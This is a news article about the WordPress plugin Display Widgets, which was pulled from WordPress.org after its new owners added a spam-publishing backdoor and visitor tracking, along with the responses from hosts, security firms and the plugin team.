Display Widgets, a plugin with more than 200,000 active installs, has been removed from WordPress.org due to its authors inserting malicious code. SEO consultant David Law was the first to bring this issue to the attention of the plugin team after discovering that Display Widgets was inserting content into sites from external servers and also collecting visitor data without permission. He posted to the WordPress.org forums several times to warn other users.
Wordfence has been warning its customers about the plugin during the past several months and published a timeline tracking how Display Widgets was removed from WordPress.org on four separate occasions. According to their independent investigation, the plugin included a backdoor that allowed the plugin author to publish spam content to the sites where Display Widgets is installed. It also prevented logged-in users from being able to see the content.
Pagely banned the Display Widgets plugin from its hosting platform this week:
For our customer’s safety, we have banned the plugin from our customer sites…The plugin will remained banned on our network until a time that we see someone has taken responsibility for the plugin and the future of patching its code.
Display Widgets had recently changed hands, as it was acquired from the team that created Formidable Forms. The previous owners have issued a warning about the plugin on Twitter, advising users to remove it from their sites.
We don't have a way of contacting users of our old Display Widgets plugin. But if you are using it you should uninstall immediately.
— Formidable Forms (@FormidableForms) September 12, 2017
It is not yet confirmed whether the plugin was acquired solely for the purpose of distributing malware, but its new owners have been fairly persistent about getting it added back to WordPress.org after each of its violations.
Display Widgets Users Advised to Update to Version 2.7 or Remove the Plugin
Users have no way of finding out that they are running malicious code unless they hear about from their host, security company, or some other third party. They do not receive a notice in the WordPress admin about the plugin having been removed from the directory. Since Display Widgets was a fairly popular plugin, there are likely many sites that still have it active and those website owners are probably unaware of the spam content they are publishing.
Yesterday the plugin team issued a notice that Display Widgets 2.7 is a clean version that restores the plugin to version 2.0.5 before the malicious code was added:
We will be leaving this version deploying updates, however at this time we will NOT be allowing for its adoption. The second owner has effectively destroyed any trust a person might have in the plugin.
Note: You CANNOT visit the page or download it as a new plugin for a reason. This plugin is done. It’s not supported, it’s not worked on, nothing. So if you have it, upgrade. Otherwise, find something else to use.
Display Widgets is now likely to end up in the graveyard of abandoned plugins, but there are many other options for adding conditional widget display to WordPress sites. Jetpack’s widget visibility module, Widget Options by Phpbits Creative Studio, Custom Sidebars by WPMU Dev, and Content Aware Sidebars are a few popular alternatives on WordPress.org.
The plugin team does not currently disclose why certain plugins have been closed or removed from WordPress.org, but they are working on providing better communication for users. One meta trac ticket requests that closed plugins have a public page instead of disappearing completely. In another related ticket, plugin team member Mika Epstein has proposed that when plugins are closed or disabled, there should be a dropdown for WordPress.org admins to select a reason why. She suggested the following as available options:
- Security Issue
- Author Request
- Guideline Violation
- Licensing/Trademark violations
- Merged into Core
The issue with Display Widgets was fairly public as users posted about their investigations on the WordPress.org support forums and various companies issued warnings about it. However, many plugins are disabled without the public knowing why. Even a short explanation like the proposed examples above would be a major improvement over leaving WordPress.org plugin users in the dark. It would assist site owners in knowing whether they need to prioritize looking for an alternative or simply wait until the situation is resolved.
I’m surprised there’s no software check in place that scans the code for disallowed PHP or JS functions ( base64_encode(), etc ) when pushing up to the Repo… That would’ve thrown a red flag immediately.